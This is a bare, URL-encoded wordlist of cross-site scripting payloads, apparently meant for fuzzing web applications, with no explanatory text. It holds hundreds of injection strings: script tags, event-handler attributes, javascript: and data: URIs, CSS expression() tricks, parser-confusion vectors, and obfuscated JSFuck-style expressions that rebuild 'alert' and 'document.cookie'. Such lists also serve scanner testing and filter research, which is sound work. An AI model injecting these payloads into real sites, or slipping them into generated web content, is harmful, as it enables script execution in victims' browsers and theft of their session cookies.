%22%3E%3Cscript%3Etry%7Beval(%22%3C%3E%3C/%3E%22);alert(1)%7Dcatch(e)%7Balert(1)%7D;%3C/script%3E '%3E%3Cscript%3Etry%7Beval(%22%3C%3E%3C/%3E%22);alert(1)%7Dcatch(e)%7Balert(1)%7D;%3C/script%3E %3Cdiv%20class=%22foo1%22%3EX%3C/div%3E%20%3Cscript%3Edocument.getElementsByClassName('foo1')[0]?alert(1):0%3C/script%3E %22%3E%3Cdiv%20class=%22foo1%22%3EX%3C/div%3E%20%3Cscript%3Edocument.getElementsByClassName('foo1')[0]?alert(1):0%3C/script%3E '%3E%3Cdiv%20class=%22foo1%22%3EX%3C/div%3E%20%3Cscript%3Edocument.getElementsByClassName('foo1')[0]?alert(1):0%3C/script%3E %22%60'/%3E%3Cimg/onload=alert(1)%20src=%22%22/%3E %3C!--%3Cimg%20src=xxx:x%20onerror=alert(1)%3E%20--%3E %22%3E%3C!--%3Cimg%20src=xxx:x%20onerror=alert(1)%3E%20--%3E '%3E%3C!--%3Cimg%20src=xxx:x%20onerror=alert(1)%3E%20--%3E %3Cscript%3E/%20/alert(1)//%20*/%3C/script%3E %22%3E%3Cscript%3E/%20/alert(1)//%20*/%3C/script%3E '%3E%3Cscript%3E/%20/alert(1)//%20*/%3C/script%3E %22'%60%3EX%3Cdiv%20style=%22font-family:'foo;x:expression(alert(1));/';%22%3EX %22'%60%3EX%3Cdiv%20style=%22font-family:'foo'x:expression(alert(1));/';%22%3EX %22'%60%3E%3Cscript%3Ea=/X;;i=0;alert(1);a/i;%3C/script%3E %3Ca%20href=%22%3E%3Cscript%3Ealert(1)%3C/script%3E '%3E%3Cscript%3Ealert(1)%3C/script%3E%22%20/%3E %22'%60%3E%3Cp%3E%3Csvg%3E%3Cscript%3Ea='X;alert(1)//';%3C/script%3E%3C/p%3E %3Cp%3E%3Csvg%3E%3Cscript%3Ealert(1)%3C/script%3E '%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/p%3E %3Ciframe%20src=%22vbscript:alert()%3E%3C/iframe%3E %22%3E%3Ciframe%20src=%22vbscript:alert()%3E%3C/iframe%3E '%3E%3Ciframe%20src=%22vbscript:alert()%3E%3C/iframe%3E X%3Cdiv%20style=%22x:expression(alert(1))%22%3EX X%3Cdiv%20style=%22xexpression(alert(1))%22%3EX %3Cscript%20src=%22data:text/plainalert(1)%22%3E%3C/script%3E %22%3E%3Cscript%20src=%22data:text/plainalert(1)%22%3E%3C/script%3E '%3E%3Cscript%20src=%22data:text/plainalert(1)%22%3E%3C/script%3E %3Cscript%20src=%22data:,alert(1)%22%3E%3C/script%3E %22%3E%3Cscript%20src=%22data:,alert(1)%22%3E%3C/script%3E '%3E%3Cscript%20src=%22data:,alert(1)%22%3E%3C/script%3E %3Cscript%20src=%22data:text/plain,alert(1)%22%3E%3C/script%3E %22%3E%3Cscript%20src=%22data:text/plain,alert(1)%22%3E%3C/script%3E '%3E%3Cscript%20src=%22data:text/plain,alert(1)%22%3E%3C/script%3E %3Cscript%3E%20if%20('a'.trim()%20===%20'')%20%7B%20alert(1);%20%7D%20%3C/script%3E %22%3E%3Cscript%3E%20if%20('a'.trim()%20===%20'')%20%7B%20alert(1);%20%7D%20%3C/script%3E '%3E%3Cscript%3E%20if%20('a'.trim()%20===%20'')%20%7B%20alert(1);%20%7D%20%3C/script%3E %22'%60%3E%3Cscript%3Ealert(1)%3C/script%3E %22'%60%3E%3Cimg%20src=xxx:x%20onerror=alert(1)%3E '%60%22%3E%3Cscript%3Ealert(1)%3C/script%3E %60%22'%3E%3Cimg%20src=xxx:x%20onerror=alert(1)%3E '%22%60%3E%3Cscript%3E/%20alert(1)//%20*/%3C/script%3E %60'%22%3E%3Cscript%3Ewindow'alert'%3C/script%3E /u0031+/u0031/u005b'/145/166/141/154'/u005d/u0028'/141/154/145/162/164/50/61/51'/u0029 /u0030/u005b/u0022/x65/x76/x61/x6C%22/u005d/u0028/u0027/x61/x6C/x65/x72/x74/x28/x31/x29'/u0029 0'eval' %3Ca%20href=%22javascript:/u0031+/u0031/u005b'/145/166/141/154'/u005d/u0028'/141/154/145/162/164/50/61/51'/u0029%22%3EX%3C/a%3E %22%3E%3Ca%20href=%22javascript:/u0031+/u0031/u005b'/145/166/141/154'/u005d/u0028'/141/154/145/162/164/50/61/51'/u0029%22%3EX%3C/a%3E '%3E%3Ca%20href=%22javascript:/u0031+/u0031/u005b'/145/166/141/154'/u005d/u0028'/141/154/145/162/164/50/61/51'/u0029%22%3EX%3C/a%3E %3Ca%20href=%22& %22%3E%3Ca%20href=%22& '%3E%3Ca%20href=%22& %3Cinput%20id='1'%3E%3Cinput%20id=1%3E%3Cscript%3Ealert(1)%3C/script%3E %22%3E%3Cinput%20id='1'%3E%3Cinput%20id=1%3E%3Cscript%3Ealert(1)%3C/script%3E '%3E%3Cinput%20id='1'%3E%3Cinput%20id=1%3E%3Cscript%3Ealert(1)%3C/script%3E %3Ca%20href=%22invalid:1%22%20id=x%20name=y%3EX%3C/a%3E%3Ca%20href=%22invalid:2%22%20id=x%20name=y%3EX%3C/a%3E%3Cscript%3Ealert(x.y[0])%3C/script%3E %22%3E%3Ca%20href=%22invalid:1%22%20id=x%20name=y%3EX%3C/a%3E%3Ca%20href=%22invalid:2%22%20id=x%20name=y%3EX%3C/a%3E%3Cscript%3Ealert(x.y[0])%3C/script%3E '%3E%3Ca%20href=%22invalid:1%22%20id=x%20name=y%3EX%3C/a%3E%3Ca%20href=%22invalid:2%22%20id=x%20name=y%3EX%3C/a%3E%3Cscript%3Ealert(x.y[0])%3C/script%3E %3Ca%20href=1%20name=x%3EX%3C/a%3E%3Ca%20href=1%20name=x%3EX%3C/a%3E%3Cscript%3Ealert(x.removeChild)//undefinedalert(x.parentNode)//undefined%3C/script%3E %22%3E%3Ca%20href=1%20name=x%3EX%3C/a%3E%3Ca%20href=1%20name=x%3EX%3C/a%3E%3Cscript%3Ealert(x.removeChild)//undefinedalert(x.parentNode)//undefined%3C/script%3E '%3E%3Ca%20href=1%20name=x%3EX%3C/a%3E%3Ca%20href=1%20name=x%3EX%3C/a%3E%3Cscript%3Ealert(x.removeChild)//undefinedalert(x.parentNode)//undefined%3C/script%3E %3Ca%20href=%22123%22%20id=x%3EX%3C/a%3E%3Cscript%3Ex='javascript:alert(1)'//only%20in%20compat!;%3C/script%3E %22%3E%3Ca%20href=%22123%22%20id=x%3EX%3C/a%3E%3Cscript%3Ex='javascript:alert(1)'//only%20in%20compat!;%3C/script%3E '%3E%3Ca%20href=%22123%22%20id=x%3EX%3C/a%3E%3Cscript%3Ex='javascript:alert(1)'//only%20in%20compat!;%3C/script%3E '%3E%3Cform%20name=self%20location=%22javascript:alert(1)%22%3E%3C/form%3E%3Cscript%3Eif(top!=self)%7B%20top.location=self.location%7D%3C/script%3E %22%3E%3Cform%20name=self%20location=%22javascript:alert(1)%22%3E%3C/form%3E%3Cscript%3Eif(top!=self)%7B%20top.location=self.location%7D%3C/script%3E %3Ciframe%20name=x%3E%3C/iframe%3E%22%3E%3C/iframe%3E%3Ca%20href=%22http://127.0.0.1:3555/xss_serve_payloads/X.html%22%20target=x%20id=x%3E%3C/a%3E%3Cscript%3Ewindow.onload=function()%7Bx.click()%7D%3C/script%3E %22%3E%3Ciframe%20name=x%3E%3C/iframe%3E%22%3E%3C/iframe%3E%3Ca%20href=%22http://127.0.0.1:3555/xss_serve_payloads/X.html%22%20target=x%20id=x%3E%3C/a%3E%3Cscript%3Ewindow.onload=function()%7Bx.click()%7D%3C/script%3E '%3E%3Ciframe%20name=x%3E%3C/iframe%3E%22%3E%3C/iframe%3E%3Ca%20href=%22http://127.0.0.1:3555/xss_serve_payloads/X.html%22%20target=x%20id=x%3E%3C/a%3E%3Cscript%3Ewindow.onload=function()%7Bx.click()%7D%3C/script%3E %3Cform%20name%3D%22body%22%20onmouseover%3D%22alert(1)%22%20style%3D%22height%3A800px%22%3E%3Cfieldset%20name%3D%22attributes%22%3E%3Cform%3E%3C%2Fform%3E%3Cform%20name%3D%22parentNode%22%3E%3Cimg%20id%3D%22attributes%22%3E%3C%2Fform%3E%3C%2Ffieldset%3E%3C%2Fform%3E %22onmouseover=%22alert(1)%22a=%22 'onmouseover='alert(1)'a=' '%20onmouseover=alert(1)' %22%20onmouseover=javascript:alert(1)%20%22 /');alert(1);// );alert(1)// ');alert(1)// %26%2339;-alert(1)// %22);alert(1);// %E0%3Cbody%20onload=alert(1)%3E X'%20alert(1)%2F%2F X%22%20alert(1)%2F%2F %5C%5C'%2Balert(1)%3B%2F%2F %3Cscript%3Ealert(1)%3B%3C%2Fscript%3E alert(1)%3B %3Cscript%3Ea%3D%2FX%2F alert(1)%3C%2Fscript%3E %22%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E X%20-%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E X%20%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E %3CSCRIPT%3Ealert(1);%3C/SCRIPT%3E %3CMETA%20HTTP-EQUIV=%22Link%22%20Content=%22%3Cjavascript:alert(1)%3E;%20REL=stylesheet%22%3E %22%3E%3CMETA%20HTTP-EQUIV=%22Link%22%20Content=%22%3Cjavascript:alert(1)%3E;%20REL=stylesheet%22%3E '%3E%3CMETA%20HTTP-EQUIV=%22Link%22%20Content=%22%3Cjavascript:alert(1)%3E;%20REL=stylesheet%22%3E '%3E%3CSTYLE%3E.X%7Bbackground-image:url(%22javascript:alert(1)%22);%7D%3C/STYLE%3E%3CA%20CLASS=X%3E%3C/A%3E %22%3E%3CSTYLE%3E.X%7Bbackground-image:url(%22javascript:alert(1)%22);%7D%3C/STYLE%3E%3CA%20CLASS=X%3E%3C/A%3E %3C!--%3Cvalue%3E%3C![CDATA[%3CXML%20ID=I%3E%3CX%3E%3CC%3E%3C![CDATA[%3CIMG%20SRC=%22javas%3C![CDATA[cript:alert(1);%22%3E %22%3E%3C!--%3Cvalue%3E%3C![CDATA[%3CXML%20ID=I%3E%3CX%3E%3CC%3E%3C![CDATA[%3CIMG%20SRC=%22javas%3C![CDATA[cript:alert(1);%22%3E '%3E%3C!--%3Cvalue%3E%3C![CDATA[%3CXML%20ID=I%3E%3CX%3E%3CC%3E%3C![CDATA[%3CIMG%20SRC=%22javas%3C![CDATA[cript:alert(1);%22%3E '%3E%3Cimg%20src=a%20onerror=alert(1)%20%0A%3E %22%3E%3Cimg%20src=a%20onerror=alert(1)%20%0A%3E %3Cimg%20src=%22x%22%20class=%22''onerror=alert(1)%22%3E %22%3E%3Cimg%20src=%22x%22%20class=%22''onerror=alert(1)%22%3E '%3E%3Cimg%20src=%22x%22%20class=%22''onerror=alert(1)%22%3E 0%3Caside%20xmlns=%22x%3E%3Cimg%20src=x%20onerror=alert(1)%22%3E1%3C/aside%3E 0%3Caside%20xmlns=%22x%3E%3Cscript%3Ealert(1)%3C/script%3E '%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E1%3C/aside%3E 0%3Caside%20xmlns=%22foo:img%20src=x%20onerror=alert(1)%3E%22%3E123 %3Cp%20%20style=%22font-family:'/22/3bx:expression(alert(1))/'%22%3E %22%3E%3Cp%20%20style=%22font-family:'/22/3bx:expression(alert(1))/'%22%3E '%3E%3Cp%20%20style=%22font-family:'/22/3bx:expression(alert(1))/'%22%3E %3Cp%20style=%22font-family:%20'foo/27/3b%20color/3a%20expression(alert(1))/ %22%3E%3Cp%20style=%22font-family:%20'foo/27/3b%20color/3a%20expression(alert(1))/* '%3E%3Cp%20style=%22font-family:%20'foo/27/3b%20color/3a%20expression(alert(1))/* %3Cp%20style=%22fon/22/3e/3cimg/20src/3dx/20onerror/3d%20alert/28%201/29/3et-family:'foobar'%22%3E %22%3E%3Cp%20style=%22fon/22/3e/3cimg/20src/3dx/20onerror/3d%20alert/28%201/29/3et-family:'foobar'%22%3E '%3E%3Cp%20style=%22fon/22/3e/3cimg/20src/3dx/20onerror/3d%20alert/28%201/29/3et-family:'foobar'%22%3E %3Cp%20style=%22filter:%20'expression(alert(1))'%22%3E %22%3E%3Cp%20style=%22filter:%20'expression(alert(1))'%22%3E '%3E%3Cp%20style=%22filter:%20'expression(alert(1))'%22%3E %3Cp%20style=%22font-family:%20'foo&x5c;27& %22%3E%3Cp%20style=%22font-family:%20'foo&x5c;27& '%3E%3Cp%20style=%22font-family:%20'foo&x5c;27& %3Ciframe/src=%22data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==%22%3E %22%3E%3Ciframe/src=%22data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==%22%3E '%3E%3Ciframe/src=%22data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==%22%3E %3Csvg%3E%3Cscript%20xlink:href=data:,window.open('http://www.opensecurity.in')%3E%3C/script %22%3E%3Csvg%3E%3Cscript%20xlink:href=data:,window.open('http://www.opensecurity.in')%3E%3C/script '%3E%3Csvg%3E%3Cscript%20xlink:href=data:,window.open('http://www.opensecurity.in')%3E%3C/script http://www.opensecurity%3Cscript%20.in%3Ealert(document.location)%3C/script perl%20-e%20'print%20%22<IMG%20SRC=java/0script:alert(/%22X/%22)>%22;'%20>%20out perl%20-e%20'print%20%22<SCR/0IPT>alert(/%22X/%22)</SCR/0IPT>%22;'%20>%20out perl%20-e%20'print%20%22%3CIMG%20SRC=java/0script:alert(1)%3E%22;'%3E%20out window%22ale%22+(!![]+[])[-~[]]+(!![]+[])[+[]] window%22ale%22+%22/x72/x74%22 window%22/x61/x6c/x65/x72/x74%22 window'ale'+(!![]+[])[-~[]]+(!![]+[])[+[]] window'ale'+'/x72/x74' window'/x61/x6c/x65/x72/x74' window(+%7B%7D+[])[-[]]+(![]+[])[--[]]+([][+[]]+[])[---[]]+(!![]+[])[-~[]]+(!![]+[])[+[]] window[(+%7B%7D+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]] this%22ale%22+(!![]+[])[-~[]]+(!![]+[])[+[]] this%22ale%22+%22/x72/x74%22 this%22/x61/x6c/x65/x72/x74%22 this'ale'+'/x72/x74' this'/x61/x6c/x65/x72/x74' this(+%7B%7D+[])[-[]]+(![]+[])[--[]]+([][+[]]+[])[---[]]+(!![]+[])[-~[]]+(!![]+[])[+[]] this[(+%7B%7D+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]] this[%22document%22][%22cookie%22] this[%22document%22][%22/x63/x6f/x6f/x6b/x69/x65%22] this[%22/x64/x6f/x63/x75/x6d/x65/x6e/x74%22][%22cookie%22] this[%22/x64/x6f/x63/x75/x6d/x65/x6e/x74%22][%22/x63/x6f/x6f/x6b/x69/x65%22] this[%22document%22][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22kie%22] this[%22document%22][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22/x6b/x69/x65%22] this[%22docum%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22/x6b/x69/x65%22] this[%22docum%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22kie%22] this[%22docum%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][%22/x63/x6f/x6f/x6b/x69/x65%22] this[%22docum%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][%22cookie%22] this[%22/x64/x6f/x63/x75/x6d%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22/x6b/x69/x65%22] this[%22/x64/x6f/x63/x75/x6d%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22kie%22] this[%22/x64/x6f/x63/x75/x6d%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][%22/x63/x6f/x6f/x6b/x69/x65%22] this[%22/x64/x6f/x63/x75/x6d%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][%22cookie%22] this['document']['cookie'] this['document']['/x63/x6f/x6f/x6b/x69/x65'] this['/x64/x6f/x63/x75/x6d/x65/x6e/x74']['cookie'] this['/x64/x6f/x63/x75/x6d/x65/x6e/x74']['/x63/x6f/x6f/x6b/x69/x65'] this['document'][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+'kie'] this['document'][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+'/x6b/x69/x65'] this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+'/x6b/x69/x65'] this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+'kie'] this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['/x63/x6f/x6f/x6b/x69/x65'] this['/x64/x6f/x63/x75/x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+'kie'] this['/x64/x6f/x63/x75/x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['/x63/x6f/x6f/x6b/x69/x65'] this['/x64/x6f/x63/x75/x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['cookie'] document[%22cookie%22] document[%22/x63/x6f/x6f/x6b/x69/x65%22] document[(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22kie%22] document[(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22/x6b/x69/x65%22] document['cookie'] document['/x63/x6f/x6f/x6b/x69/x65'] document[(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+'kie'] document[(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+'/x6b/x69/x65'] %3Cscript%3Edocument.body.innerHTML=%22%3Ca%20onmouseover%0B=location=%27/x6A/x61/x76/x61/x53/x43/x52/x49/x50/x54/x26/x63/x6F/x6C/x6F/x6E/x3B/x63/x6F/x6E/x66/x69/x72/x6D/x26/x6C/x70/x61/x72/x3B/x64/x6F/x63/x75/x6D/x65/x6E/x74/x2E/x63/x6F/x6F/x6B/x69/x65/x26/x72/x70/x61/x72/x3B%27%3E%3Cinput%20name=attributes%3E%22;%3C/script%3E %3Cmeta%20http-equiv=%22X-UA-Compatible%22%20content=%22IE=5%22%3E%3Cp%20style=%22font-family:',;a//22//3e//3cimg//20src//3dx//20onerror//3d//61lert//28//31//29//3e:1'%22%3Eoh-oh%3C/p%3E %22%3E%3Cmeta%20http-equiv=%22X-UA-Compatible%22%20content=%22IE=5%22%3E%3Cp%20style=%22font-family:',;a//22//3e//3cimg//20src//3dx//20onerror//3d//61lert//28//31//29//3e:1'%22%3Eoh-oh%3C/p%3E '%3E%3Cmeta%20http-equiv=%22X-UA-Compatible%22%20content=%22IE=5%22%3E%3Cp%20style=%22font-family:',;a//22//3e//3cimg//20src//3dx//20onerror//3d//61lert//28//31//29//3e:1'%22%3Eoh-oh%3C/p%3E %3Ciframe/onload=action=/confir/.source+'m';eval(action)(1)%3E %22%3E%3Ciframe/onload=action=/confir/.source+'m';eval(action)(1)%3E '%3E%3Ciframe/onload=action=/confir/.source+'m';eval(action)(1)%3E %3C!--[if%20WindowsEdition]%3E%3Cscript%3Econfirm(1);%3C/script%3E%3C![endif]--%3E %22%3E%3C!--[if%20WindowsEdition]%3E%3Cscript%3Econfirm(1);%3C/script%3E%3C![endif]--%3E '%3E%3C!--[if%20WindowsEdition]%3E%3Cscript%3Econfirm(1);%3C/script%3E%3C![endif]--%3E %3Cimg%20src=x%20onerror=confirm(/X/)%3E %22%3E%3Cimg%20src=x%20onerror=confirm(/X/)%3E '%3E%3Cimg%20src=x%20onerror=confirm(/X/)%3E %3Cform/action=ja vascr ipt:confirm(1)%3E%20%3Cbutton/type=submit%3E %22%3E%3Cform/action=ja vascr ipt:confirm(1)%3E%20%3Cbutton/type=submit%3E '%3E%3Cform/action=ja vascr ipt:confirm(1)%3E%20%3Cbutton/type=submit%3E %3Cstyle/onload%20%20%20%20=%20%20%20%20!-alert& %22%3E%3Cstyle/onload%20%20%20%20=%20%20%20%20!-alert& '%3E%3Cstyle/onload%20%20%20%20=%20%20%20%20!-alert& %3Ciframe/name=%22if(0)%7B/u0061lert(1)%7Delse%7B/u0061lert(1)%7D%22/onload=%22eval(name)%22;%3E %22%3E%3Ciframe/name=%22if(0)%7B/u0061lert(1)%7Delse%7B/u0061lert(1)%7D%22/onload=%22eval(name)%22;%3E '%3E%3Ciframe/name=%22if(0)%7B/u0061lert(1)%7Delse%7B/u0061lert(1)%7D%22/onload=%22eval(name)%22;%3E %3Csvg%3E%3C%E2%80%AEGMO=%60%3Cftw=%60skrowtillehehtwoh;%20onload=confirm(location); %22%3E%3Csvg%3E%3C%E2%80%AEGMO=%60%3Cftw=%60skrowtillehehtwoh;%20onload=confirm(location); '%3E%3Csvg%3E%3C%E2%80%AEGMO=%60%3Cftw=%60skrowtillehehtwoh;%20onload=confirm(location); %22%3E%3Cimg%20src=x%20onerror=confirm(1);%3E %3Cimg/src=x%20alt=confirm(1)%20onerror=eval(alt)%3E %22%3E%3Cimg/src=x%20alt=confirm(1)%20onerror=eval(alt)%3E '%3E%3Cimg/src=x%20alt=confirm(1)%20onerror=eval(alt)%3E %3Cimg%20src=x%20onerror=alert(1)//%3E %22%3E%3Cimg%20src=x%20onerror=alert(1)//%3E '%3E%3Cimg%20src=x%20onerror=alert(1)//%3E %3Csvg%3E%3Cg/onload=alert(1)// %22%3E%3Csvg%3E%3Cg/onload=alert(1)// '%3E%3Csvg%3E%3Cg/onload=alert(1)// %3Ciframe///src=jAva script:alert(1)%3E %22%3E%3Ciframe///src=jAva script:alert(1)%3E '%3E%3Ciframe///src=jAva script:alert(1)%3E %3Cmath%3E%3Cmi//xlink:href=%22data:x,%3Cscript%3Ealert(1)%3C/script%3E onClick=%22alert('Hello%20/u0022%3E')%22 onload=alert(1) %22%20onload=alert(1)%20%22 %22%20onload=alert(1) %20onload=alert(1)%20%22 %22%20onload=alert(1)%20id=%22a onload%20=alert(1)%20id=%22a %3Ca%20href=' %22%3E%3Ca%20href=' '%3E%3Ca%20href=' javascript:alert(1)'%3Ea%3C/a%3E %3Clisting%3E<img%20onerror=%22alert(1);//%22%20src=1>%3Ct%20t%3E%3C/listing%3E %22%3E%3Clisting%3E<img%20onerror=%22alert(1);//%22%20src=1>%3Ct%20t%3E%3C/listing%3E '%3E%3Clisting%3E<img%20onerror=%22alert(1);//%22%20src=1>%3Ct%20t%3E%3C/listing%3E %3Cimg%20src=x%20id/='%20onerror=alert(1)//'%3E %22%3E%3Cimg%20src=x%20id/='%20onerror=alert(1)//'%3E '%3E%3Cimg%20src=x%20id/='%20onerror=alert(1)//'%3E %3Ctextarea%3EX%3C/textarea%3E%3C!--%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(1)%3E--%3E %22%3E%3Ctextarea%3EX%3C/textarea%3E%3C!--%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(1)%3E--%3E '%3E%3Ctextarea%3EX%3C/textarea%3E%3C!--%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(1)%3E--%3E %3Cb%3E%3Cnoscript%3E%3C!--%20%3C/noscript%3E%3Cimg%20src=xx:%20onerror=alert(1)%20--%3E%3C/noscript%3E %22%3E%3Cb%3E%3Cnoscript%3E%3C!--%20%3C/noscript%3E%3Cimg%20src=xx:%20onerror=alert(1)%20--%3E%3C/noscript%3E '%3E%3Cb%3E%3Cnoscript%3E%3C!--%20%3C/noscript%3E%3Cimg%20src=xx:%20onerror=alert(1)%20--%3E%3C/noscript%3E %3Cb%3E%3Cnoscript%3E%3Ca%20alt=%22%3C/noscript%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E%22%3E%3C/noscript%3E %22%3E%3Cb%3E%3Cnoscript%3E%3Ca%20alt=%22%3C/noscript%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E%22%3E%3C/noscript%3E '%3E%3Cb%3E%3Cnoscript%3E%3Ca%20alt=%22%3C/noscript%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E%22%3E%3C/noscript%3E %3Cbody%3E%3Ctemplate%3E%3Cs%3E%3Ctemplate%3E%3Cs%3E%3Cimg%20src=x%20onerror=alert(1)%3EX%3C/s%3E%3C/template%3E%3C/s%3E%3C/template%3E %22%3E%3Cbody%3E%3Ctemplate%3E%3Cs%3E%3Ctemplate%3E%3Cs%3E%3Cimg%20src=x%20onerror=alert(1)%3EX%3C/s%3E%3C/template%3E%3C/s%3E%3C/template%3E '%3E%3Cbody%3E%3Ctemplate%3E%3Cs%3E%3Ctemplate%3E%3Cs%3E%3Cimg%20src=x%20onerror=alert(1)%3EX%3C/s%3E%3C/template%3E%3C/s%3E%3C/template%3E %3Ca%20href=%22%01java%03script:alert(1)%22%3EX%3Ca%3E %22%3E%3Ca%20href=%22%01java%03script:alert(1)%22%3EX%3Ca%3E '%3E%3Ca%20href=%22%01java%03script:alert(1)%22%3EX%3Ca%3E %01%3Coption%3E%3Cstyle%3E%3C/option%3E%3C/select%3E%3Cb%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E%3C/style%3E%3C/option%3E %3Coption%3E%3Ciframe%3E%3C/select%3E%3Cb%3E%3Cscript%3Ealert(1)%3C/script%3E '%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/iframe%3E%3C/option%3E %3Cb%3E%3Cstyle%3E%3Cstyle/%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E %22%3E%3Cb%3E%3Cstyle%3E%3Cstyle/%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E '%3E%3Cb%3E%3Cstyle%3E%3Cstyle/%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E %3Cb%3E%3Cstyle%3E%3Cstyle////%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E%3C/style%3E %22%3E%3Cb%3E%3Cstyle%3E%3Cstyle////%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E%3C/style%3E '%3E%3Cb%3E%3Cstyle%3E%3Cstyle////%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E%3C/style%3E %3Cimage%20name=body%3E%3Cimage%20name=adoptNode%3EX%3Cimage%20name=firstElementChild%3E%3Csvg%20onload=alert(1)%3E %22%3E%3Cimage%20name=body%3E%3Cimage%20name=adoptNode%3EX%3Cimage%20name=firstElementChild%3E%3Csvg%20onload=alert(1)%3E '%3E%3Cimage%20name=body%3E%3Cimage%20name=adoptNode%3EX%3Cimage%20name=firstElementChild%3E%3Csvg%20onload=alert(1)%3E %3Cimage%20name=activeElement%3E%3Csvg%20onload=alert(1)%3E %22%3E%3Cimage%20name=activeElement%3E%3Csvg%20onload=alert(1)%3E '%3E%3Cimage%20name=activeElement%3E%3Csvg%20onload=alert(1)%3E %3Cimage%20name=body%3E%3Cimg%20src=x%3E%3Csvg%20onload=alert(1);%20autofocus%3E,%20%3Ckeygen%20onfocus=alert(1);%20autofocus%3E %22%3E%3Cimage%20name=body%3E%3Cimg%20src=x%3E%3Csvg%20onload=alert(1);%20autofocus%3E,%20%3Ckeygen%20onfocus=alert(1);%20autofocus%3E '%3E%3Cimage%20name=body%3E%3Cimg%20src=x%3E%3Csvg%20onload=alert(1);%20autofocus%3E,%20%3Ckeygen%20onfocus=alert(1);%20autofocus%3E %3Cdiv%20onmouseout=%22javascript:alert(/X/)%22%20x=yscript:%20n%3EX %22%3E%3Cdiv%20onmouseout=%22javascript:alert(/X/)%22%20x=yscript:%20n%3EX '%3E%3Cdiv%20onmouseout=%22javascript:alert(/X/)%22%20x=yscript:%20n%3EX %3Cdiv%20wow=removeme%20onmouseover=alert(1)%3Etext 